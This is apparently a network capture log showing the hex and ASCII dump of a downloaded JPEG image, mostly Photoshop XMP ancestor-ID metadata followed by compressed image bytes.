                                                                                                                                                                                    2023-01-05 07:58:10 UTC4922INData Raw: 35 44 38 33 30 41 32 30 36 38 31 31 38 30 38 33 42 46 44 39 41 39 46 38 31 37 33 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 44 31 37 43 41 45 33 38 41 32 30 36 38 31 31 38 41 36 44 44 34 36 44 41 30 43 41 31 30 43 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 44 34 32 42 30 45 44 44 37 43 34 45 30 31 31 39 42 42 31 45 31 37 45 39 37 44 34 42 37 35 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 44 34 41 38 43 35 45 43 41 37 39 45 32 31 31 38 32 38 31 46 42 33 31 38 34 32 39 30 42 42 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 39 44 37 32 38 38 46 33 31 41 32 30 36 38 31 31 38 43 31 34 42 38 37 30 37 44 35
                                                                                                                                                                                    Data Ascii: 5D830A2068118083BFD9A9F81730</rdf:li> <rdf:li>xmp.did:9D17CAE38A2068118A6DD46DA0CA10CF</rdf:li> <rdf:li>xmp.did:9D42B0EDD7C4E0119BB1E17E97D4B75C</rdf:li> <rdf:li>xmp.did:9D4A8C5ECA79E2118281FB3184290BB9</rdf:li> <rdf:li>xmp.did:9D7288F31A2068118C14B8707D5
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4926INData Raw: 2e 64 69 64 3a 41 31 30 38 35 41 38 45 43 33 32 30 36 38 31 31 42 45 33 33 45 44 33 44 43 44 31 32 32 39 38 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 41 31 30 42 35 34 37 35 32 32 38 41 31 31 45 30 39 45 39 37 42 33 43 34 31 37 32 33 37 37 38 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 41 31 30 42 35 34 37 39 32 32 38 41 31 31 45 30 39 45 39 37 42 33 43 34 31 37 32 33 37 37 38 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 41 31 30 44 33 34 31 41 35 31 38 43 45 33 31 31 39 44 39 43 39 42 35 36 44 34 33 41 33 37 33 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 41 31 31 37 41 46 38 34 46 41 32 33 45 32 31 31 42 30
                                                                                                                                                                                    Data Ascii: .did:A1085A8EC3206811BE33ED3DCD122986</rdf:li> <rdf:li>xmp.did:A10B5475228A11E09E97B3C417237787</rdf:li> <rdf:li>xmp.did:A10B5479228A11E09E97B3C417237787</rdf:li> <rdf:li>xmp.did:A10D341A518CE3119D9C9B56D43A3732</rdf:li> <rdf:li>xmp.did:A117AF84FA23E211B0
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4942INData Raw: 41 46 42 45 42 33 36 42 33 44 30 39 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 42 38 35 34 39 43 39 36 46 42 32 31 31 31 45 35 42 37 32 41 42 35 34 36 44 38 34 36 32 30 45 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 42 38 35 36 42 43 37 35 46 38 32 30 36 38 31 31 38 30 38 33 41 33 39 39 39 45 39 46 34 39 33 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 42 38 38 32 46 31 35 43 31 34 32 30 36 38 31 31 38 44 42 42 42 38 38 39 35 37 39 31 35 34 30 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 42 38 38 38 38 39 30 41 41 42 38 45 45 30 31 31 41 44 33 46 46 37 36 44 30 42 41 43 39 44 43 38 3c 2f 72 64 66 3a 6c 69 3e 20
                                                                                                                                                                                    Data Ascii: AFBEB36B3D090</rdf:li> <rdf:li>xmp.did:B8549C96FB2111E5B72AB546D84620ED</rdf:li> <rdf:li>xmp.did:B856BC75F82068118083A3999E9F4936</rdf:li> <rdf:li>xmp.did:B882F15C142068118DBBB8895791540D</rdf:li> <rdf:li>xmp.did:B888890AAB8EE011AD3FF76D0BAC9DC8</rdf:li>
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4958INData Raw: 41 35 36 46 31 46 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 43 45 46 31 43 32 34 37 36 35 33 34 45 31 31 31 42 44 39 34 39 34 46 46 45 31 36 37 33 35 44 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 43 46 30 31 42 34 37 30 43 36 43 34 31 31 45 30 38 43 38 31 38 43 35 42 36 34 31 39 36 44 30 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 43 46 30 42 34 41 30 44 39 36 32 32 36 38 31 31 38 32 32 41 39 45 34 31 38 46 34 35 35 43 35 44 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 43 46 32 38 31 42 35 35 43 33 32 30 36 38 31 31 42 45 33 33 45 44 33 44 43 44 31 32 32 39 38 36 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69
                                                                                                                                                                                    Data Ascii: A56F1F</rdf:li> <rdf:li>xmp.did:CEF1C2476534E111BD9494FFE16735DE</rdf:li> <rdf:li>xmp.did:CF01B470C6C411E08C818C5B64196D09</rdf:li> <rdf:li>xmp.did:CF0B4A0D96226811822A9E418F455C5D</rdf:li> <rdf:li>xmp.did:CF281B55C3206811BE33ED3DCD122986</rdf:li> <rdf:li
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4965INData Raw: 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 36 44 35 33 32 43 31 46 31 33 44 45 30 31 31 42 46 32 32 45 31 33 39 35 42 44 33 37 41 39 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 36 44 39 43 37 35 39 35 41 32 30 36 38 31 31 39 32 42 30 42 46 30 39 37 46 37 43 35 37 38 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 36 46 45 45 34 41 39 45 35 31 33 45 34 31 31 38 30 45 37 43 37 41 34 35 41 43 38 34 46 37 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 44 37 30 31 31 46 42 45 45 33 46 43 45 30 31 31 41 44 30 41 41 35 35 31 32 31 42 32 44 44 45 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a
                                                                                                                                                                                    Data Ascii: df:li> <rdf:li>xmp.did:D6D532C1F13DE011BF22E1395BD37A91</rdf:li> <rdf:li>xmp.did:D6D9C7595A20681192B0BF097F7C5780</rdf:li> <rdf:li>xmp.did:D6FEE4A9E513E41180E7C7A45AC84F73</rdf:li> <rdf:li>xmp.did:D7011FBEE3FCE011AD0AA55121B2DDEB</rdf:li> <rdf:li>xmp.did:
                                                                                                                                                                                    2023-01-05 07:58:10 UTC4997INData Raw: 31 37 34 30 37 32 30 36 38 31 31 39 37 41 35 41 31 37 31 36 33 41 33 43 44 44 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 45 44 37 46 31 31 37 34 30 37 32 30 36 38 31 31 41 32 32 39 41 39 42 32 46 37 35 39 33 44 32 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 45 44 44 38 34 37 38 37 31 44 32 30 36 38 31 31 38 41 36 44 41 30 39 45 39 34 44 44 46 44 46 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 45 44 44 43 38 44 37 41 31 30 33 46 45 31 31 31 42 37 32 44 45 44 35 41 30 36 41 36 35 45 43 42 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 45 44 45 35 32 32 46 35 38 42 32 30 36 38 31 31 38 46 36 32 45 46 30 45 33 42 35 36
                                                                                                                                                                                    Data Ascii: 1740720681197A5A17163A3CDD7</rdf:li> <rdf:li>xmp.did:ED7F117407206811A229A9B2F7593D2E</rdf:li> <rdf:li>xmp.did:EDD847871D2068118A6DA09E94DDFDFC</rdf:li> <rdf:li>xmp.did:EDDC8D7A103FE111B72DED5A06A65ECB</rdf:li> <rdf:li>xmp.did:EDE522F58B2068118F62EF0E3B56
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5013INData Raw: 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 39 37 46 31 31 37 34 30 37 32 30 36 38 31 31 38 30 38 33 45 42 38 33 43 36 32 42 44 37 43 31 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 39 37 46 31 31 37 34 30 37 32 30 36 38 31 31 38 36 30 42 43 37 30 45 42 37 34 42 44 42 30 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 39 37 46 31 31 37 34 30 37 32 30 36 38 31 31 38 37 31 46 41 41 41 30 38 30 31 46 45 32 37 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 39 37 46 31 31 37 34 30 37 32 30 36 38 31 31 38 37 31 46 42 30 31 30 32 30 46 30 44 37 44 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69
                                                                                                                                                                                    Data Ascii: /rdf:li> <rdf:li>xmp.did:F97F1174072068118083EB83C62BD7C1</rdf:li> <rdf:li>xmp.did:F97F117407206811860BC70EB74BDB09</rdf:li> <rdf:li>xmp.did:F97F117407206811871FAAA0801FE274</rdf:li> <rdf:li>xmp.did:F97F117407206811871FB01020F0D7D7</rdf:li> <rdf:li>xmp.di
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5037INData Raw: 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 43 39 39 38 43 42 32 30 37 32 30 36 38 31 31 39 32 42 30 45 39 30 44 30 34 38 45 41 37 32 43 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 43 42 36 43 32 38 46 30 43 32 30 36 38 31 31 39 30 36 36 39 39 42 39 39 33 38 30 41 41 39 45 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 43 42 38 45 33 39 46 33 45 37 35 31 31 45 37 42 34 43 46 41 44 41 34 32 37 43 45 35 32 46 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 43 43 45 35 36 44 37 42 34 32 30 36 38 31 31 38 43 31 34 45 43 36 39 39 31 34 43 38 35 36 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 46 43 44 32
                                                                                                                                                                                    Data Ascii: i> <rdf:li>xmp.did:FC998CB20720681192B0E90D048EA72C</rdf:li> <rdf:li>xmp.did:FCB6C28F0C206811906699B99380AA9E</rdf:li> <rdf:li>xmp.did:FCB8E39F3E7511E7B4CFADA427CE52F0</rdf:li> <rdf:li>xmp.did:FCCE56D7B42068118C14EC69914C8563</rdf:li> <rdf:li>xmp.did:FCD2
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5328INData Raw: 64 3a 62 65 31 65 64 31 34 35 2d 35 63 64 63 2d 64 61 34 32 2d 62 35 35 33 2d 39 38 36 38 61 65 65 31 61 30 63 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 62 65 33 30 63 37 39 35 2d 62 31 62 61 2d 32 61 34 66 2d 61 32 63 66 2d 36 34 36 65 63 36 39 61 62 31 38 39 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 62 65 33 35 66 35 65 66 2d 61 37 66 61 2d 34 64 32 38 2d 39 66 38 66 2d 32 34 35 65 66 30 39 33 35 63 63 34 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 62 65 34 35 30 35 64 65 2d 36 62 32 38 2d 34 62 32 37 2d 38 64 37 39 2d 37 30 66 33 33 33 30 31 37 61 34 32 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 62 65 35 37 32
                                                                                                                                                                                    Data Ascii: d:be1ed145-5cdc-da42-b553-9868aee1a0c0</rdf:li> <rdf:li>xmp.did:be30c795-b1ba-2a4f-a2cf-646ec69ab189</rdf:li> <rdf:li>xmp.did:be35f5ef-a7fa-4d28-9f8f-245ef0935cc4</rdf:li> <rdf:li>xmp.did:be4505de-6b28-4b27-8d79-70f333017a42</rdf:li> <rdf:li>xmp.did:be572
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5360INData Raw: 39 32 34 64 2d 38 31 64 36 2d 66 34 65 36 61 37 39 34 66 39 39 62 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 65 62 32 37 34 64 61 30 2d 32 35 64 31 2d 66 30 34 31 2d 62 61 33 64 2d 33 36 31 61 33 31 36 38 35 63 39 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 65 62 33 65 34 63 32 32 2d 66 33 30 35 2d 65 62 34 62 2d 39 64 38 34 2d 30 62 37 34 30 37 36 65 66 35 65 33 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 65 62 38 61 34 31 39 65 2d 35 33 31 31 2d 34 36 37 61 2d 39 35 62 63 2d 35 62 30 33 35 63 39 66 34 37 33 30 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 65 62 39 37 36 66 36 30 2d 37 62 62 66 2d 34 32 33 30 2d 61 61
                                                                                                                                                                                    Data Ascii: 924d-81d6-f4e6a794f99b</rdf:li> <rdf:li>xmp.did:eb274da0-25d1-f041-ba3d-361a31685c97</rdf:li> <rdf:li>xmp.did:eb3e4c22-f305-eb4b-9d84-0b74076ef5e3</rdf:li> <rdf:li>xmp.did:eb8a419e-5311-467a-95bc-5b035c9f4730</rdf:li> <rdf:li>xmp.did:eb976f60-7bbf-4230-aa
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5407INData Raw: 63 61 64 39 32 61 3c 2f 72 64 66 3a 6c 69 3e 20 3c 72 64 66 3a 6c 69 3e 78 6d 70 2e 64 69 64 3a 66 66 64 35 37 61 63 62 2d 38 64 37 38 2d 34 38 35 33 2d 38 35 35 35 2d 63 65 33 32 61 36 36 30 30 35 31 37 3c 2f 72 64 66 3a 6c 69 3e 20 3c 2f 72 64 66 3a 42 61 67 3e 20 3c 2f 70 68 6f 74 6f 73 68 6f 70 3a 44 6f 63 75 6d 65 6e 74 41 6e 63 65 73 74 6f 72 73 3e 20 3c 2f 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 ff ee 00 21 41 64 6f 62 65 00 64 00 00 00 00 01 03 00 10 03 02 03 06 00 00 00 00 00 00 00 00 00 00 00 00 ff db 00 84 00 06 04 04 07 05 07 0b 06 06 0b 0e 0a 08 0a 0e 11 0e 0e 0e 0e 11 16 13 13 13 13 13 16 11 0c 0c 0c 0c 0c 0c 11 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c
                                                                                                                                                                                    Data Ascii: cad92a</rdf:li> <rdf:li>xmp.did:ffd57acb-8d78-4853-8555-ce32a6600517</rdf:li> </rdf:Bag> </photoshop:DocumentAncestors> </rdf:Description> </rdf:RDF> </x:xmpmeta> !Adobed
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5423INData Raw: 54 2a 2a 8f 89 a8 ea d4 2b e7 10 9d 45 cd c0 f8 70 d5 02 14 c0 f8 38 70 d4 27 44 73 21 a8 0e 4e ca a0 99 4f 87 c3 80 e2 60 0b 37 01 46 51 c4 23 93 e2 9d 8d 34 f0 e8 d8 c3 6d 08 b7 33 6e c5 9d 33 26 69 72 29 4e ad 5d 3b 8c b2 ee 8a 8a 94 2e d0 5a 0d 25 d9 51 2b 69 6a 90 34 37 3e 30 9f 9c 69 ce 9e 99 da 42 d2 2a a6 a7 49 bc 82 d1 47 b1 35 e9 cd 65 b8 a5 2c b0 b8 04 ca 39 e6 e8 03 a4 b5 4c b4 bd 66 bd 49 87 03 e7 32 36 27 48 27 a9 06 a0 55 9a 3b 60 96 fc fc 10 1c 12 d7 05 9a 80 90 e0 fb 4f 8b eb 51 95 08 6a 05 56 54 28 2e a2 a9 c8 86 ce 44 35 51 c0 f8 54 64 08 6d c8 b8 06 1c 15 6b 91 51 d1 a9 4e 05 46 f8 50 1c 28 1d 5b e4 a0 72 8a b2 a2 91 d5 10 d4 0e 25 cb 20 2c 10 aa 45 c9 d5 ae 2a c9 5e 6e 53 20 d5 79 d2 8a a1 89 d2 d2 3b 9e be 8b 9b 7d fc 36 7b 3d 18 54
                                                                                                                                                                                    Data Ascii: T**+Ep8p'Ds!NO`7FQ#4m3n3&ir)N];.Z%Q+ij47>0iB*IG5e,9LfI26'H'U;`OQjVT(.D5QTdmkQNFP([r% ,E*^nS y;}6{=T
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5439INData Raw: bb 0d 45 39 fd 36 de 99 e7 e2 44 e8 fb 6b bc b3 29 0c b2 25 ad 98 ad 27 ad a9 14 6c c6 0a cb d2 07 4e f0 dd 50 0d 1a ad ac cb 92 d6 67 ae f3 cc 6e 8d 17 d9 59 82 31 cf bd 36 b3 6c 13 8d b6 42 2a e6 7c ec d9 d2 75 7a 78 69 a1 cb c7 a7 98 95 42 fd 16 ce 5a 2e c4 35 9c fd 95 d1 a3 cc 57 5c ea e9 1b d9 5b d1 e8 e4 34 50 ef 58 25 0d 19 a6 58 46 75 eb 20 75 9e ae 58 fb 3e 59 f9 e7 7e e3 2f 53 10 15 9a bb e6 37 75 8d 2c 22 d6 4d c9 39 a1 3d 97 76 bd 15 11 a1 c6 b9 10 cc d9 ec 0d 73 96 9a 21 18 ea 21 50 4e bf 39 9f ab 68 5e 8b 9b 4a ba ca ad 43 ae 41 51 a9 18 b5 96 b9 1b b6 b2 cf 57 07 c9 a5 b5 ab 5b d0 e7 be 93 bd c4 b1 f4 a8 d0 57 69 9c cd bc 35 53 4d f2 76 e6 cc d5 19 2b 08 f9 5f ad e3 db d0 6b b6 59 cf e5 7a e3 34 9e 9d 3d 57 2b ec ef 5b 7d 7c a6 9c 73 96 98
                                                                                                                                                                                    Data Ascii: E96Dk)%'lNPgnY16lB*|uzxiBZ.5W\[4PX%XFu uX>Y~/S7u,"M9=vs!!PN9h^JCAQW[Wi5SMv+_kYz4=W+[}|s
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5447INData Raw: 7a 23 67 19 cb dc 99 46 46 d6 2d 4b d1 8c c0 d9 6c f5 5a d5 2f 26 26 73 36 03 73 64 d9 cf a6 9e 97 0e 24 52 d1 a3 39 c0 2d d5 90 a8 b5 15 57 67 95 5b 1c e9 09 c3 24 52 17 a8 14 68 47 24 15 47 02 92 8a 20 15 09 73 21 3e 14 a7 e8 39 f9 f3 76 b6 52 97 2b 94 27 9f 14 1a aa ad 42 54 05 dc b2 41 22 8b 52 5c de 6d 5b 99 c9 1a 72 2f d3 71 c6 45 5e 4f 55 68 e0 10 cb 3b a2 c1 46 f7 1b d5 75 e6 fa 23 47 18 0d bc 3d a9 6d 62 a0 9a da 43 63 96 34 f1 5f 4b f2 35 f2 7e 9d 61 f5 60 da bf 39 ad a7 a4 a9 4b e9 9e 77 1f 95 d7 b7 67 29 65 a5 8a 3e fc fe 87 82 fe 5f e8 74 7d c7 c3 ec c8 e8 e6 03 c6 f5 39 7d 79 af b6 c8 c3 f4 99 6f 97 ba cc db 3c dd a3 d0 f0 eb e7 b6 c4 12 de 33 4d d1 f4 c8 59 eb ab 83 67 29 f3 7d 5a 18 ca f3 5b 39 d5 94 a8 d8 9c af 70 fe 22 1a 69 93 b8 c9 13
                                                                                                                                                                                    Data Ascii: z#gFF-KlZ/&&s6sd$R9-Wg[$RhG$G s!>9vR+'BTA"R\m[r/qE^OUh;Fu#G=mbCc4_K5~a`9Kwg)e>_t}9}yo<3MYg)}Z[9p"i
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5463INData Raw: de 39 3d 1a 5d 54 eb 93 19 5b a6 4f 73 75 0d 5e df 35 a4 65 a9 8e 55 75 05 ec f2 5e 8e 3a ad bd 29 71 a1 8a e7 15 a5 97 a0 c6 6d 2d 31 b6 a2 1b 5e a6 14 48 6b 74 c2 77 7d 13 ad cf 21 d7 3b 3d 57 bb 9c cb 5d 0f 4b 98 c9 0b a6 a4 67 3d 03 a7 26 5e aa 26 87 70 a6 b4 ee 51 71 ea 4c f9 3e 8d bd 0f 3e 02 35 ad f4 01 98 f7 af b0 e7 af 9d fa 16 8e bc de 87 8f 9e f4 1c bf 23 d5 ad 05 e8 b3 e7 f5 19 f5 eb 7a 39 fc 89 c6 87 3e 99 da c9 f1 9f 7b c5 d1 f3 8f 41 4e d8 b1 cf 9a f5 a1 25 d1 e6 0a b6 62 55 b5 4a aa 0e c3 a0 cc 05 1a ea 0a ca b6 ce 7a ca cf 5f 3d 82 e7 17 58 5e e7 98 54 50 54 6a 50 d3 6b 93 55 25 53 a5 88 c9 dc b9 16 52 17 8b b1 9f a6 e4 ac 0e ad f2 36 c7 ff da 00 08 01 02 00 01 05 00 07 c1 82 13 04 22 11 08 84 42 20 99 87 c0 30 19 8f 07 df 81 e7 1e 31 33
                                                                                                                                                                                    Data Ascii: 9=]T[Osu^5eUu^:)qm-1^Hktw}!;=W]Kg=&^&pQqL>>5#z9>{AN%bUJz_=X^TPTjPkU%SR6"B 013
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5487INData Raw: 0c 23 0c cb 3d c6 62 62 fa 36 0c 00 61 f5 09 e3 03 98 1c 34 5c 09 c7 33 dc ff 00 2d 57 29 a8 ae a3 88 11 66 09 86 bf 5e 84 66 e5 00 8b fc 4e c7 17 44 ca b7 eb 31 9a 15 c9 a7 39 b5 79 4a 17 d0 1f c9 ea 32 ba f3 13 02 13 88 08 59 8c 96 02 06 22 33 88 ed c6 03 ce 05 e2 33 99 8f 4e f8 83 60 92 1c 98 47 a0 d8 87 0c 59 0e 4e 44 c4 41 00 c8 03 12 c0 44 5c 92 a4 e7 3e 31 9f 18 83 df 83 f0 0c 61 90 a6 06 13 e0 fc 41 0b 62 2b 98 ac 0c 54 20 b3 81 16 c2 c5 57 13 39 9c 32 05 38 33 10 a6 60 59 88 17 11 a1 04 90 72 39 40 60 98 81 b0 63 08 73 16 66 03 31 88 3d c1 31 31 31 e0 1c 42 7d 19 fe 7f c6 21 f5 2c 02 02 4c e4 4c 11 86 27 ec 02 3b e4 f0 2a 6c 24 4f 64 20 e3 15 86 2c 60 22 a0 52 a0 98 57 33 88 31 84 60 58 01 e9 41 31 bd 43 93 15 78 c4 58 e4 89 96 31 3d 46 f9 e2 4c
                                                                                                                                                                                    Data Ascii: #=bb6a4\3-W)f^fND19yJ2Y"33N`GYNDAD\>1aAb+T W9283`Yr9@`csf1=111B}!,LL';*l$Od ,`"RW31`XA1CxX1=FL
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5494INData Raw: 25 4c 27 00 36 7c e7 f0 f9 fc 07 e6 0e 26 3c 63 30 cc c1 19 f8 c5 40 0f 13 8c e2 21 19 c7 25 fe 40 85 cc 52 0c 51 08 22 37 c5 4d 93 f8 5e fe ea 52 aa 85 84 6b 38 95 b1 83 96 51 2b 20 10 d9 2a 20 6f 2d 66 22 9c 81 ff 00 0e 65 a6 2f b9 9c 4c 99 9c 02 09 9b 0a 78 ad 40 82 81 57 5d 31 19 4e 13 24 aa 32 35 68 44 03 24 8c 40 9e b8 08 44 7c 99 80 20 6c 1c 66 15 11 dc 2c 07 30 c0 0c 55 c4 cf 8b 03 13 88 56 5b ae 0a 87 28 b5 d3 c8 f1 e3 00 c9 63 c6 c5 18 26 b1 fb 14 19 72 73 5a 94 28 0c 0c 64 e5 00 8a d9 99 cc 09 c5 b3 83 b6 8f 60 ad 82 86 24 8f 46 7c 78 41 ff 00 03 01 2b 26 7c 85 58 26 66 60 3e a6 67 2f 1f 13 3e f3 82 7f e0 cc f9 87 dc 0b 31 e2 c6 e2 12 e0 c7 00 4f 42 21 02 1a c8 6b 0c af dc 5f e0 7f 69 e4 d6 81 12 34 7b 02 0b af 32 97 2e a2 82 85 94 2c a8 33 9f
                                                                                                                                                                                    Data Ascii: %L'6|&<c0@!%@RQ"7M^Rk8Q+ * o-f"e/Lx@W]1N$25hD$@D| lf,0UV[(c&rsZ(d`$F|xA+&|X&f`>g/>1OB!k_i4{2.,3
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5725INData Raw: 4c e5 eb fe c5 2a 22 7e b3 18 30 82 cc ca d4 c6 70 21 20 07 60 65 67 30 00 00 18 81 f1 0b 83 18 16 83 18 36 60 88 46 48 1c 47 0c cc e2 29 c9 26 64 b4 3e c8 5f 4b 62 b4 b2 a0 41 a3 d5 79 05 9f 10 da 58 96 0a 2a 7c cc cf d8 20 bc 4b 2c 04 d7 fc 63 0c 16 f9 4f 71 9f 8c b9 cb 14 f8 cc 36 4e 78 9f b2 06 81 a0 70 4f 39 cb c6 26 21 f5 31 0f a8 0e 61 19 85 60 6c 43 88 10 18 14 7f c0 4f 8c c6 19 8c b9 86 b0 61 a8 4e 38 8c 73 1b dc af d4 ce 27 ff da 00 08 01 03 00 01 05 00 33 10 4c 4c 42 b1 60 33 e6 03 3d cc 4c 45 f2 7c 09 8f 07 c6 67 c7 e1 f3 e7 1f 81 f3 9f 07 ce 7c e7 c1 fc 18 79 06 09 f3 0f 81 e0 c3 e0 40 3c 09 88 3d 4c 7e 58 86 0f 06 01 9f c3 3e 3e 3c 11 e4 f8 cc 3e 02 c2 33 19 0c 22 11 e3 3e 3e 66 3f 11 ff 00 e3 91 f8 91 e0 7b 80 c1 31 09 fc 71 0c 03 ce 73 3e
                                                                                                                                                                                    Data Ascii: L*"~0p! `eg06`FHG)&d>_KbAyX*| K,cOq6NxpO9&!1a`lCOaN8s'3LLB`3=LE|g|y@<=L~X>><>3">>f?{1qs>
                                                                                                                                                                                    2023-01-05 07:58:10 UTC5741INData Raw: 0c f5 90 20 5c 46 30 4c e6 62 30 10 60 42 33 31 e1 0e 20 73 33 00 cc 74 c1 ac 92 32 00 24 4c f8 0b 00 22 31 24 8f 81 ee 11 ef e3 c1 3e 82 fa 2b 92 a7 31 81 80 4c 7a 13 dc 7c 3c 2b 82 4e 46 21 99 c4 53 99 cc 44 4e 45 90 10 48 50 08 33 96 27 b3 08 cc 1e bc 13 88 1b 31 8c 68 58 c0 a5 8c 39 33 1e 80 99 e3 0b 7b e5 33 9f 0a e5 8f c1 1e c8 c0 85 89 84 40 33 0c c6 26 31 0f b8 3d c6 18 80 e2 20 39 66 50 57 26 12 04 c6 61 59 99 80 22 56 41 23 13 3e a7 a1 15 f9 4e 20 c2 79 00 3d 2b 7b cc f9 96 21 13 91 89 ec 1a a0 58 17 11 84 c6 66 21 85 73 19 3d fe cf 6c 31 19 62 fa 8a 79 40 49 88 9c 60 af 30 99 88 26 7c 7b 10 b6 61 84 18 46 06 31 14 e6 7e ce 50 7a 84 f8 ff 00 24 e6 63 c1 f7 38 64 85 86 2c 46 84 4f 88 d1 57 1e 02 9c 16 c4 ac 93 38 e6 33 40 a4 c2 71 3e 4a fa 85 f2
                                                                                                                                                                                    Data Ascii: \F0Lb0`B31 s3t2$L"1$>+1Lz|<+NF!SDNEHP3'1hX93{3@3&1= 9fPW&aY"VA#>N y=+{!Xf!s=l1by@I`0&|{aF1~Pz$c8d,FOW83@q>J
